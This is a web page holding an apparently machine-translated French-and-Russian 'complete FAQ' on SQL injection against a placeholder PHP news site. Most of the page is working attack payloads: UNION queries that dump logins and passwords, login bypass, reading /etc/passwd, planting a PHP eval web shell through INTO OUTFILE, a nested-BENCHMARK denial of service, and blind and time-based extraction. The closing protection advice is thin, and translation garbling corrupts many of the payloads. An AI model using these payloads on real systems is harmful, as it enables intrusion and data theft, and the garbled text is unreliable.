thème spécial

Guerre Ukraine Russie

Piratage et protection ... l'injection SQL ...

Injection SQL [FAQ complète]

0.INTRO

1. COMMENT TROUVER SQL INJECTION

2. QUOI ET COMMENT peuvent être tirées de ce utile

3. QUE FAIRE SI champs NO de sortie.

4. Que faire si le filtre de quelque chose.

5. Fonctions utiles MYSQL

6. Comment se protéger contre SQL INJECTION

7. AJOUTS

0.INTRO

Laziv sur l'Internet à la recherche d'au moins une partie des informations sur l' injection SQL , vous devez avoir souvent rencontré des articles ou très courte ou ne sont pas claires, soit couvrant un seul sujet ou toute autre chose que vous avez certainement ne convenait pas. Lorsque je grattais ensemble quelque part les articles 10-20 sur le sujet à saisir les subtilités des nombreuses vulnérabilités. Et se souvenant de l'époque où je décidé d'écrire une FAQ complète sur ce sujet, pour ainsi dire le reste ne sont pas obsédés. Et encore une demande. Ceux qui trouve que je raté quelque chose, quelque part fait une erreur, et ainsi se désinscrire s'il vous plaît ci-dessous, il est difficile tout de même, tous garder à l'esprit

. Par la façon dont ceci est mon premier article, s'il vous plaît ne pas jeter des tomates, et des coups de pied.

Je n'emporté par le premier jour du cambriolage , vous savez probablement ce que une injection SQL si pas alors I est l'article pour vous. injection SQL est l'injection d'un autre type d'attaque dans laquelle l'attaquant a modifié la demande initiale à la base de données afin que les informations dont il a besoin à partir de la base de données a été obtenue lorsque la requête est exécutée.

Pour l'assimilation de cet article est nécessaire:
a) La présence du cerveau
b) les mains directes
dans) la connaissance du langage SQL

Fondamentalement, cet article a été écrit pour MYSQL PHP +, mais il y a quelques exemples avec MSSQL.

En général, je pense que la meilleure façon d'apprendre l'utilisation correcte de l' injection SQL est pas la lecture de cet article, mais une pratique de vie, par exemple pour écrire un script vulnérable ou utiliser mon donné à la fin.

Par la façon dont je vous conseille de tout lire , car à chaque point il y a quelque chose d' important pour l'élément suivant, etc.

1. COMMENT TROUVER SQL INJECTION

Il est assez simple. Il est nécessaire d'insérer dans tous les domaines, les variables, les cookies, les doubles et les guillemets simples.

1,1 secondes premier

Commençons par ce script ici

1. Supposons que la demande initiale à la base de données ressemble à ceci:
SELECT * FROM news WHERE id=' 1 '; Maintenant, nous ajoutons citation dans un "id", de cette façon - si la variable est non filtrée et inclus des messages d'erreur qui sortent quelque chose comme ceci:

mysql_query (): Vous avez une erreur dans votre syntaxe SQL; vérifier le manuel qui correspond à votre MySQL version du serveur pour le droit d'utiliser la syntaxe près de ' 1' '

Étant donné que la requête à la base de données sera présent devis supplémentaire:
SELECT * FROM news WHERE id=' 1' '; Si le rapport d'erreurs est désactivée dans ce cas, vous pouvez déterminer la présence de vulnérabilités comme ça (aussi, ne vous arrêtez pas, ce ne serait pas être confondu avec le paragraphe 1.4 Comme il est décrit dans le même paragraphe.): C'est une demande à la base de données sera comme ceci:
SELECT * FROM news WHERE id=' 1'; -- '; (Pour ceux qui sont dans le réservoir "-" un signe du début du commentaire, après tout, il sera jeté, je voudrais attirer votre attention sur le fait que, après il devrait toujours être un espace (Il est écrit dans la documentation du MYSQL) et la manière devant lui aussi). Ainsi , pour MYSQL requête reste le même et semblent les mêmes que pour http :? //xxx/news.php Id = 1
Tom ce qu'il faut faire pour ce numéro est dédié à l'ensemble du paragraphe 2.

1.2 Le second cas

Dans l' opérateur SQL LIKE là. Il est utilisé pour comparer des chaînes. Ici, nous supposons l'autorisation de script lors de la saisie des requêtes de base de données username et password comme ceci:

SELECT * FROM utilisateurs WHERE services connexion LIKE 'Admin' ET passer LIKE '123';

Même si le script filtre la citation qu'il reste encore vulnérable à l'injection. Nous avons besoin au lieu d'un mot de passe suffit de saisir "%" (pour l'opérateur LIKE "%" caractère correspond à toute chaîne), puis la demande sera

SELECT * FROM utilisateurs WHERE services connexion LIKE 'Admin' ET passent LIKE '%';

et nous avons été autorisés à entrer dans la connexion 'Admin'. Dans ce cas, nous avons non seulement trouvé une injection SQL , mais aussi utilisé avec succès.

1.3 Le troisième cas

Que faire si le même script de connexion ne vérifie pas pour les citations. IMHO est au moins ridicule d'utiliser cette sortie pour une injection une sorte d'information. Laissez interroger la base de données pour être de type:

SELECT * FROM utilisateurs WHERE login = 'Admin' et passe = '123';

Malheureusement, votre mot de passe '123' ne convient pas

Mais disons que nous avons trouvé une injection dans le paramètre 'login' et ce serait enregistrer sous le nom de 'Admin', nous avons besoin d'écrire à la place quelque chose comme ça Admin '; - Cela fait partie de l'authentification par mot de passe est rejeté et nous passons par le surnom de «Admin».

SELECT * FROM utilisateurs WHERE login = ' Admin'; - 'ET pass =' 123 ';

Maintenant, ce qu'il faut faire si une vulnérabilité dans la case 'passe'. Nous équipons dans ce domaine suivant 123 'OU login =' Admin '; -. La demande sera:

SELECT * FROM utilisateurs WHERE login = ' Admin' et passe = ' 123' OU login = 'Admin'; - ';

Quant à la base de données sera complètement indeintichno cette demande:

SELECT * FROM utilisateurs WHERE (login = 'Admin' ET pass = '123') OR (login = 'Admin');

Après ces étapes, nous allons devenir pleinement propriétaire d'Akka avec login 'Admin'.

1.4 Le quatrième cas

Revenons au script de nouvelles. Du langage SQL, nous devons nous rappeler que les paramètres numériques ne sont pas mis entre guillemets qui est à cette adresse au script http :? //xxx/news.php Id = 1 requête à la base de données ressemble à ceci:

SELECT * FROM nouvelles WHERE id = 1;

Pour trouver cette injection peut également être cité en remplacement paramètre 'id' et ensuite sauter le même message d'erreur:

mysql_query (): Vous avez une erreur dans votre syntaxe SQL; vérifier le manuel qui correspond à votre MySQL version du serveur pour le droit d'utiliser la syntaxe près de ' 1' '

Si ce message ne vyprigivaet pas que nous pouvons comprendre que la citation est filtrée puis entrez http: //xxx/news.php id = 1 bla-bla-bla?
DB ne comprend pas pour sho bla bla bla, et affiche un message sur le type d'erreur:

mysql_query (): Vous avez une erreur dans votre syntaxe SQL; vérifier le manuel qui correspond à votre MySQL version du serveur pour le droit d'utiliser la syntaxe près de ' 1-bla bla-bla'

Si le rapport d'erreurs est désactivée puis vérifier comme ceci http: //xxx/news.php id = 1 ;? -
Vous devriez obtenir comme http :? //xxx/news.php Id = 1

Maintenant, vous pouvez passer à l'étape 2.

2. QUOI ET COMMENT peuvent être tirées de ce utile

Suivant sera considéré que le type de vulnérabilités décrites au paragraphe 1.1 et le reste peut modifier sous lui-même est pas difficile

2.1 UNION commandement

Pour commencer le plus utile est l'UNION de l' équipe (qui ne sait pas aller dans Google) ...
Modifier la référence au script http: id //xxx/news.php = 1 'UNION SELECT 1 - ?. Interrogation de la base de données que nous obtenons comme ceci:

SELECT * FROM nouvelles WHERE id = '1' UNION SELECT 1 - ';

2.1.1.1 Choix du nombre de champs (méthode 1)

Ne pas oublier le fait que le nombre de colonnes à l'Union et après doit se conformer sûrement à l'erreur (à moins que la table ne sont pas une colonne de nouvelles) comme ceci:

mysql_query (): Les instructions SELECT utilisées ont un nombre différent de colonnes

Dans ce cas, nous avons besoin de choisir kolichistvo colonnes (quel que soit leur nombre à UNION et après sootvetsvovalo). Nous faisons de cette façon:

http: //xxx/news.php id = 1 'UNION SELECT 1, 2 -
Erreur. «Les instructions SELECT utilisées ont un différent nombre de colonnes»

http: //xxx/news.php id = 1 'UNION SELECT 1,2,3 -?
Encore une fois l'erreur.
...

http: //xxx/news.php id = 1 'UNION SELECT 1,2,3,4,5,6 -?
Oh! Afficher la correcte ainsi que http :? //xxx/news.php Id = 1
désigne le nombre de domaines choisis, à savoir leurs 6 pièces ...

2.1.1.2 Choix du nombre de champs (Méthode 2)

Et cette méthode est basée sur la sélection du nombre de champs à l' aide de GROUP BY. Autrement dit, ce type de demande:

http: //xxx/news.php id = 1 'GROUP BY 2 -?

Il est affiché sans erreur si le nombre de champs est inférieur ou égal à 2.
Nous faisons ce type de demande:

http: //xxx/news.php id = 1 'GROUP BY 10 -?

Oups ... Il y avait un type d'erreur.

mysql_query (): Unknown colonne '10' 'déclaration du groupe'

Donc, la colonne est inférieure à 10. Diviser 10 par 2. Et faire la demande

http: //xxx/news.php id = 1 'GROUP BY 5 -?

Erreur Opa ne signifie que le nombre de colonnes est supérieure ou égale à 5 mais inférieur à 10. Maintenant , prenez la valeur moyenne comprise entre 5 et 10, il se trouve comme un 7. Faire une demande:

http: //xxx/news.php id = 1 'GROUP BY 7 -?

Oh erreur encore ...

mysql_query (): Unknown colonne '7' 'déclaration du groupe'

Ainsi , le nombre est supérieur ou égal à 5 mais inférieur à 7. Eh bien, alors faites la demande

http: //xxx/news.php id = 1 'GROUP BY 6 -?

Aucune erreur ... Ainsi , le nombre est supérieur ou égal à 6 mais inférieur à 7. Il en résulte que le nombre requis de colonnes 6.

2.1.1.3 Choix du nombre de champs (Méthode 3)

Le même principe que dans le paragraphe 2.1.1.2 seule fonction est utilisée ORDER BY. Et le texte d'erreur légèrement différente si les champs plus.

mysql_query (): Unknown colonne '10' 'order clause'

2.1.2 colonnes de sortie Définition

Je pense que beaucoup d' entre nous est exactement la page comme http :? //xxx/news.php Id = 1 est pas satisfait. Nous devons donc faire en sorte que la première recherche n'a pas afficher (jusqu'à UNION). Le plus simple est de changer le "id" avec un '1' à '-1' (ou '9999999')
http :? id //xxx/news.php = -1 ' UNION SELECT 1,2,3,4,5,6 - Maintenant , nous avons quelque chose où la page doit être affiché dans l' une de ces figures. (Par exemple, car il est conditionnel nouvelles de script dans le "Nom des nouvelles" affichera 3 disons, «Nouvelles», etc. Eh bien, -4). Maintenant nous arrivons à ce que jamais l'information que nous devons remplacer ces chiffres dans obrschenii au script de la fonction nécessaire. Si les chiffres ne sont pas affichés nulle part les alinéas restants du paragraphe 2.1 peuvent être ignorées.

2.1.3 SIXSS (SQL Injection Cros Site Scripting )

Ce même XSS exact que par une requête à la base de données. exemple:
http :? id //xxx/news.php = -1 ' UNION SELECT 1,2,3,' <script> alert ( 'SIXSS') </ script> ', 5,6 - Eh bien, je pense pas difficile de comprendre que 4 page est remplacé par le <script> alert ( 'SIXSS' ) </ script> et par conséquent obtenir exactement la même XSS.

2.1.4 Les noms des colonnes / tables

Si vous connaissez le nom et une colonne des tables dans la base de données, vous pouvez ignorer cet article
Si vous ne savez pas ... Il y a deux façons.

2.1.4.1 Les noms des colonnes / tables s'il y a accès à la INFORMATION_SCHEMA et si la version de MYSQL> = 5

Table INFORMATION_SCHEMA.TABLES contient des informations sur toutes les tables de la base de données, les noms TABLE_NAME tables colonnes.
http :? id //xxx/news.php = -1 ' UNION SELECT 1,2,3, TABLE_NAME, 5,6 à partir de INFORMATION_SCHEMA.TABLES - Ceci est l' endroit où vous pouvez voir un problème. Comme il sera affiché uniquement la première ligne de la réponse de la base de données. Ensuite , nous avons besoin d'utiliser LIMIT comme ceci:

La sortie de la première ligne:
http: id = //xxx/news.php -1 'UNION SELECT 1,2,3, TABLE_NAME, 5,6 DE INFORMATION_SCHEMA.TABLES LIMIT 1,1 -?

La sortie de la deuxième ligne:
? Http: id = //xxx/news.php -1 ' UNION SELECT 1,2,3, TABLE_NAME, 5,6 à partir de INFORMATION_SCHEMA.TABLES LIMIT 2,1 - etc.

Eh bien, nous avons trouvé une table utilisateur. Seul ce ... ahem ... toute colonne sais pas ... Puis nous arrivons à l'aide de la table colonne INFORMATION_SCHEMA.COLUMNS COLUMN_NAME contient le nom d'une colonne dans la table TABLE_NAME. Voilà comment nous extrayons les noms de colonnes

http: id = //xxx/news.php -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 DE INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' LIMIT Users '1,1 -?

http: id = //xxx/news.php -1 'UNION SELECT 1,2,3, COLUMN_NAME, 5,6 DE INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' LIMIT Users '2,1 -?
etc.

Et nous trouvons ici le login de champ, mot de passe.

2.1.4.2 Les noms des colonnes / tables s'il n'y a pas accès à la INFORMATION_SCHEMA

Cette option zhopny

.tut Entre en brutofors ordinaires de force ... Exemple:

http: id = //xxx/news.php -1 'UNION SELECT 1,2,3,4,5,6 DE tbl_name -?

Il est nécessaire de sélectionner table_name jusqu'à ce que ne disparaisse pas une erreur comme:

mysql_query (): Table 'table_name' does not exist

Eh bien, nous avons introduit les utilisateurs de bonheur manquants message d'erreur, et la page apparaîtra comme si http :? //xxx/news.php Id = -1 ' UNION SELECT 1,2,3,4,5,6 - ce que cela signifie ? Cela signifie que la table suschestvet utilisateurs et doit procéder à des colonnes de tri.

http: id = //xxx/news.php -1 'UNION SELECT 1,2,3, nom_colonne, 5,6 des utilisateurs -?

Il est nécessaire de sélectionner column_name jusqu'à ce que ne disparaisse pas une erreur comme:

mysql_query (): Unknown column 'column_name' 'dans' liste des champs '

Où disparaît message d'erreur signifie qu'il ya une telle colonne.

Et nous avons appris que la table a des colonnes utilisateur, mot de passe.

2.1.5 Afficher les informations

Appel au script pour http :? //xxx/news.php Id = -1 ' UNION SELECT 1,2, login, mot de passe, 5,6 des utilisateurs LIMITER 1,1 - nous Affiche le login et le mot de passe du premier utilisateur de la table utilisateurs.

2.2 Travailler avec les fichiers

2.2.1 Rédaction d'un fichier

Il est dans une telle fonction MYSQL intéressante de type SELECT ... INTO OUTFILE vous permet d'enregistrer des informations dans un fichier. Soit cette conception SELECT ... INTO DUMPFILE ils sont presque semblables et vous pouvez utiliser tout.

Exemple: http: id = //xxx/news.php -1 ' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE' 1.txt '; -

certaines restrictions pour son travail.

Interdiction de l' écrasement des fichiers
privilèges FILE Type Recherché
(!) Certes présente kyvychki en spécifiant le nom du fichier

Mais qu'est-ce qui nous empêche de faire le web aller? Voici un exemple comme celui-ci:

http: id = //xxx/news.php -1 'UNION SELECT 1,2,3,' ', 5,6 INTO OUTFILE'? 1.php < ? php eval ($ _ GET [ 'e']) ??> '; -

Il ne reste plus qu'à trouver le chemin d'accès complet à la racine d'un site sur le serveur et l'ajouter à 1.php. Vriprintsipe peut trouver une autre erreur sur le rapport qui sera présenté le chemin vers le serveur ou laisser le serveur racine et son inkluda locale ramasser, mais cela est un autre sujet.

2.2.2 fichiers de lecture

Considérons la fonction LOAD_FILE

Exemple: http: id = //xxx/news.php -1 ' UNION SELECT 1,2, LOAD_FILE (' etc / passwd '), 4,5,6 ;?

Pour elle, il y a aussi quelques limitations.

Il doit y avoir un chemin complet du fichier.
privilèges FILE Type Recherché
Le fichier doit se trouver sur le même serveur
La taille de ce fichier doit être inférieure à max_allowed_packet indiquée
Le fichier doit être ouvert en lecture par l'utilisateur sous lequel est en cours d' exécution MYSQL

Si la fonction ne peut pas lire le fichier, il renvoie NULL.

2.3 attaque DOS sur le serveur SQL

Dans la plupart des cas, SQL Server dosyat en raison du fait que rien d'autre ne peut le faire. Type de ne pouvait pas trouver des tables / colonnes, aucun droit à lui, aucun droit à elle, etc. Honnêtement, je contre cette méthode, mais quand même ...

Faites le point ...
fonction BENCHMARK exécute la même action à plusieurs reprises.

BENCHMARK SELECT (100000, md5 (current_time));

Autrement dit, cette fonction est 100.000 fois fait md5 (current_time) que mon ordinateur prend environ 0,7 secondes ... Il semble qu'il y est telle ... Et si vous essayez de BENCHMARK attaché?

BENCHMARK SELECT (100000, BENCHMARK (100000, md5 (current_time)));

Il prend beaucoup de temps pour être honnête, je ne l'ai même pas attendu ... dû faire une remise à zéro

.
Exemple Dosa dans notre cas:

http: id = //xxx/news.php -1 'UNION SELECT 1, 2, BENCHMARK (100.000, BENCHMARK (100.000, md5 (current_time))), 4, 5, 6 ;? -

100 F5 Poke est assez juste "tomber dans le serveur sans retenue vers le bas"))).

3. Que faire si les champs NO de sortie.

3.1 Par buste du personnage

Ce cas nous avons besoin si http :? //xxx/news.php Id = 1 à id différent nous donnera des résultats différents. Par exemple http :? //xxx/news.php Id = 1 est différent de http :? //xxx/news.php Id = 0 sinon, cette méthode est inutile , mais la lecture à la fin en vaut la peine.

Comme nous rappelons la demande à la base de données que nous avons ressemble à ceci

SELECT * FROM nouvelles WHERE id = '1';

Maintenant, nous modifions les personnes vulnérables par id PARAMTR à une telle demande (si quelque chose d'inconnu va au paragraphe 5 et lu):

SELECT * FROM nouvelles WHERE id = ' -1' OU id = SI (ASCII ((SELECT USER ()))> = 254, '1', '0') - ';

Voici comment:

? Http: id //xxx/news.php = -1 ' OU id = SI (ASCII ((SELECT USER ()))> = 254,' 1 ',' 0 ') -

Que pouvons-nous faire pour vous? Pour démarrer MYSQL effectue un SELECT USER sous - requête () insère dans ASCII () qui retourne le code ascii du premier caractère du résultat de la fonction IF () renvoie 1 si le code est supérieur ou égal à 100 sous - requête et
demande osnovnoy de le devenir

SELECT * FROM nouvelles WHERE id = '- 1' OU id = 1

et exécuté de la même manière que lors de l' accès au script http :? id //xxx/news.php = 1 et si le code de ce nombre est inférieur à la demande de base pour le devenir

SELECT * FROM nouvelles WHERE id = '- 1' OU id = 0

et réalisée aussi bien que dans http: id //xxx/news.php = 0 On dit que la requête conditionnelle renvoie 1 (oui) ou 0 (pas), respectivement, et de commencer à toucher ?.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 100,' 1 ',' 0 ')
Ouais retourné 1 signifie le premier caractère est supérieur ou égal à 100. Essayez ceci:

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 200,' 1 ',' 0 ')
Retourné 0 signifie 100 <= code de caractère <200.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 150,' 1 ',' 0 ')
Encore une fois retourné 0 signifie 100 <= code de caractère <150.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 125,' 1 ',' 0 ')
Et je suis retourné 0 signifie 100 <= code de caractère <125.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 113,' 1 ',' 0 ')
Retourné 1 sledovatelno113 <= code de caractère <125.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 118,' 1 ',' 0 ')
Retours sledovatelno113 0 <= code de caractère <118.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1)> = 115,' 1 ',' 0 ')
113 <= caractère <code 115.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1) = 113,' 1 ',' 0 ')
Retourné 0 signifie que le code de caractère est pas égal à 113.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1,1) = 114,' 1 ',' 0 ')
Hourra! Retourné 1 signifie que le code de caractères est 114. Nous traduisons à un personnage et d' obtenir le symbole "r". Nous passons maintenant au caractère suivant.

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 2,1)> = 100,' 1 ',' 0 ')

Et encore une fois, nous répétons toutes les étapes précédentes.

3.2 caractère par caractère en utilisant BENCHMARK brute

Que faire s'il n'y a pas de sortie du champ et des rapports d'erreur off? Pour vous aider, nous arriverons à fonctionner BENCHMARK. Comme cela est décrit ci-dessus, cette fonction exécute une seule opération plusieurs fois. Donc, ce que vous demandez ... Et c'est ce que. Rappelons que la demande

BENCHMARK SELECT (100000, BENCHMARK (100000, md5 (NOW ())));

réalisée sooo long, et sur la base du retard (non, ne soyez pas peur de ne pas les retards qui sont maintenant pensés) un caractère va trier tout paramètre est le nom d'utilisateur valide en vertu de laquelle nous sommes connectés à la base de données (il nous faut à la fonction USER ()).

http :? id //xxx/news.php = -1 ' OU id = SI (ASCII (SUBSTRING ((USER SELECT ()), 1, 1)))> = 100, 1, BENCHMARK (2999999, MD5 (NOW ()))) -

La demande sera:

SELECT * FROM nouvelles WHERE id = ' -1' OU id = SI (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, BENCHMARK (2999999, MD5 (NOW ())) ) - ';

Et maintenant, par analogie avec le paragraphe précédent, nous allons régler le USER string (). Seulement dans ce cas, au lieu de 0, la fonction sera un temps très long pour mener à bien cette demande et que nous allons parler de cette requête renvoie 0, respectivement, et si sans délai la requête renvoie 1.

Maintenant, nous allons parler du temps de retard. Afin de déterminer le moment du retour 0 et 1 doivent faire des enquêtes préliminaires:

http: id //xxx/news.php = -1 'OR id = IF ( 99> 100, 1, BENCHMARK (2999999, MD5 (NOW ())) )?

Will return 0. Il est nécessaire de mesurer le temps. En fonction de votre bande passante nécessaire pour ramasser le nombre 2999999 dans la mesure où vous pouvez juger précisément si oui ou non il y avait un retard par rapport à la

http :? id //xxx/news.php = -1 ' OU id = IF ( 101> 100, 1, BENCHMARK (2999999, MD5 (NOW ())) )

qui sera de retour 1.

Le grand inconvénient est que BENCHMARK th nous expédions beaucoup un serveur.

ATTENTION! Dans ce cas, l'important est de ne pas oublier que , après chaque serveur BENCHMARK-SQL exécution et besoin de se reposer pendant un certain temps. (Un peu plus de faire BENCMARK travail lui - même). Dans le cas contraire, les résultats de cette recherche exhaustive peuvent être incorrectes.

3.3 Par la recherche de caractères à l'aide de rapports d'erreurs

Cet article a été écrit sur la base (uniquement sur la base d'aucun réimpressions!) Article, «alternative New Benchmark'y ou SQL-injection aveugle efficace" auteur Elekt, respecter.

Cette méthode est basée sur le fait qu'au lieu de retourner à 0, la sous-requête est à l' origine de l'erreur et l'erreur peut être conclu que le juge renvoyé 0 et en l'absence d'erreur qui est retourné 1. Cette méthode nous aidera s'il n'y a pas de sortie du champ , mais y compris (!) Un rapport d'erreur.

SELECT * FROM nouvelles WHERE id = '- 1' OU id = (SELECT 1 UNION SELECT 2)

Pensez-vous qu'il reviendrait cette demande? Corriger une erreur puisque id est comparée à la sous-requête qui renvoie deux lignes.

mysql_query (): Subquery renvoie plus de 1 rang

Telle était la théorie. Nous passons maintenant à la requête que nous allons trier les caractères

SELECT * FROM nouvelles WHERE id = ' -1' OU id = SI (ASCII (SUBSTRING ((SELECT USER ()), 1, 1)))> = 100, 1, (SELECT 1 UNION SELECT 2)) - ' ;

Comme on le voit à partir de cette demande si le code de caractère est supérieur ou égal à 100 fonction IF () retourne 1, et aucune erreur sont alors monte et si la fonction effectue sous_requête

SELECT 1 UNION SELECT 2

qui renvoie les deux lignes par rapport à l'id est une erreur et nous nous rendons compte que la requête renvoie 0.

Le grand inconvénient de cette méthode est que les journaux sont collectés grand nombre d'erreurs. Un énorme avantage est la vitesse.

3.4 injections après ORDER BY

Pourquoi alors, beaucoup avaient l'impression qu'il est un cas désespéré. Eh bien, qu'est-ce qu'on va changer cette opinion contraire. Laissez DB requête ressemble à ceci:

* SELECT FROM nouvelles ORDER BY $ par

Eh bien, comme toujours par la variable $ ne passe pas de filtrage, et de sortie de plusieurs lignes à partir d'une page de base de données. Eh bien, nous avons besoin de recevoir deux demandes qui allait changer en quelque sorte conclus sur la page, mais demande encore doit être telle que vous pouvez influencer le résultat par laisser les sous-requêtes. Comme ces demandes peuvent être
http: //xxx/news.php par = (id * 1)?
http: //xxx/news.php par = (id * -1)?
J'espère que vous l'avez deviné dans un second temps l'échantillon sera "top-down" par rapport à la première demande, pourquoi est pas difficile à comprendre. Disons que pour la première fois apporté, l' accepter comme vérité:

Les premières nouvelles deuxième nouvelles Troisième nouvelles

Un deuxième mensonge:

La troisième nouvelles deuxième nouvelles premières nouvelles

demande Well Well pour Brutus nom de l'utilisateur actuel ressemblera à ceci:
http: //xxx/news.php par = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 112,1, -1))?
Bien inverse effectivement hachurée nouvelles de commande => false
http: //xxx/news.php par = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 113,1, -1))?
Encore une fois, un mensonge
http: //xxx/news.php par = (id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 114,1, -1))?
Oh! Commande directe nouvelles => true
Traduire le code de caractères 114 dans le symbole r. Aller au caractère suivant et ainsi de suite.

4.Qu FAIRE SI filtre QUELQUE CHOSE.

4.1 écart Filtré

Eh bien, pour commencer nous rappelons que la conception / ** / style SQL est un espace. Et vous pouvez passer à l'étape 4.2.

4.2 Filtré caractère / ligne

Есть интересная функция которая возвращает по коду символа сам символ.Предположим фильтруется символ... ну пускай будет звездочка (*). Для начала нам нужно узнать код этого символа. В MYSQL есть функция ASCII() возвращает код самого левого символа из переданной ей строке юзается так

SELECT ASCII('*');

только на уязвимом хосте этого делать смысла нет (Символ '*' фильтруется) это нужно сделать на локалке. Узнаем что код равен 42 и юзаем функцию CHAR() так

SELECT CHAR(42, 42, 42);

Выведет три звездочки.Еще один способ это использовать 16-ричный код символа. Теперь предположим что фильтруется солово 'login'. В MYSQL есть функция HEX() которая выдает 16-ричный код строки. Юзается так

SELECT HEX('login');

Выдаст '6C6F67696E' впереди дописываем "0x" (Чтобы SQL понял что имеет дело с 16-ричной кодировкой) и получаем '0x6C6F67696E ' это юзать без CHAR() так

SELECT 0x6C6F67696E FROM User;

либо с так

SELECT CHAR(0x6C,0x6F,0x67,0x69,0x6E) FROM User;

5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL

Надеюсь что за SELECT, INSERT, UPDATE, DELETE, DROP вы знаете, если нет то лезем в эту книжку читать: google.com (Большой справочник языку SQL).

----------------------------
USER() -функция выводит логин юзера под которым мы подключены к MYSQL
DATABASE() -функция выводит название БД к которой мы подключены
VERSION() -выводит версию MYSQL
----------------------------
ASCII( str ) -возвращает ASCII код первого символа в строке "str"
CHAR( xx1,xx2,... ) -возвращает строку состоящую из сомволов ASCII коды которых xx1, xx2 и т.д.
HEX( str ) -возвращает 16-ричный эквивалент строки "str".
----------------------------
LENGTH( str ) - Возвращает длину строки "str".
SUBSTRING( str,pos[,len] ) -Возвращает подстроку длиной len(если не указан то до конца строки "str") символов из строки "str", начиная от позиции pos.
LOCATE( substr,str[,pos] ) -Возвращает позицию первого вхождения подстроки "substr" в строку "str" начиная с позиции pos(если не указанно то с начала строки "str"). Если подстрока "substr" в строке "str" отсутствует, возвращается 0.
----------------------------
LOWER( str ) -переводит в нижний регистр строку "str"(по-моему только латиницу)
CONCAT( param1,param2,... ) -объединение подстрок в одну строку.
CONCAT_WS( sep,param1,param2,... ) -объединение подстрок в одну строку c разделителем "sep".
----------------------------
IF( exp,ret1,ret2 ) -Проверяет условие exp если оно верно (не равно 0) то возвращает строку ret1 а если нет то возвращает строку ret2.
----------------------------
expr BETWEEN min AND max -Если величина выражения expr больше или равна заданному значению min и меньше или равна заданному значению max, то функция BETWEEN возвращает 1, в противном случае - 0.
----------------------------
AES_DECRYPT(AES_ENCRYPT( 'строка' , 'bla' ), 'bla' ) Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
----------------------------

Теперь о комментариях в Mysql
1) # символ начала комментария в MySQL. Пример:

SELECT pass,login FROM users #This is comment

что аналогично запросу

SELECT pass,login FROM users

2) -- еще один вариант комментария в MySQL. Обязателен пробел после этого знака. Пример:

SELECT pass,login FROM users -- This is comment

3) /* */ аналог комментария СИ в MySQL. Закрывающая часть необязательна. Для MySQL индеинтична пробелу. Примеры:

SELECT pass,login FROM users /*This is comment SELECT pass,login /*This is comment*/ FROM users SELECT /**/ pass,login /**/ FROM /**/ users

4) /*!int*/ Расширение предыдущего комментария. Все заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше. Пример:

SELECT pass /*!32302 ,login*/ FROM users

Выведет столбец login если версия MySQL равна либо выше 3.23.02

6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

Вы конечно понимаете что именно для этого пункта и писалась вся эта статья. Все пункты и их подпункты были написанны лишь для того что бы понять все серьезнось ситуации, а за использование этих пунктов в целях противоречащих УКРФ автор данной статьи ответственность не несет.

А защитится очень просто. Кстати все три правила относятся к трем способам передачи информации серверу GET, POST, Cookie.

1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1

Développer / Réduire

Commentaires

Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.

Gratuit Carte de crédit avec une limite de 15.000 USD.

'); var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = 'https://ad.admitad.com/shuffle/e61acebe19/'+subid_block+'?inject_to='+injectTo; var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x); })();

Toutes les Nouvelles

Comment choisir le vin à votre plat photo 08/03/2017
Comment habiller en fonction de l' âge et ne pas regarder stupide photo 08/03/2017
Version sexy de «Suivez - moi» photo 03/08/2017
Une assiette de nourriture saine photo 08/03/2017
La NASA a ouvert l' accès à son logiciel photo 08/03/2017
Kate Moss, la génération principale de la beauté, une femme fatale photo 08/03/2017
101 Comment utiliser parachute cordon photo 05/03/2017
Tout ce que vous vouliez savoir sur les pneus. types de marquage, la saisonnalité photo 05/03/2017
Comment choisir des épices et des herbes naturelles de haute qualité photo 04/03/2017
Emma Watson (26) Section pour la Foire Mars de Vanity photo 03/04/2017
Emma Watson (Emma Watson) déshabillée pour un livre de beauté du naturel photo 03/04/2017
Tatouage avec l'image des héros célèbres photo 03/03/2017
Conduire tous les transports urbains à Kiev photo 28/02/2017
Combien de fois faut - il avoir des relations sexuelles selon l'âge photo 28/02/2017
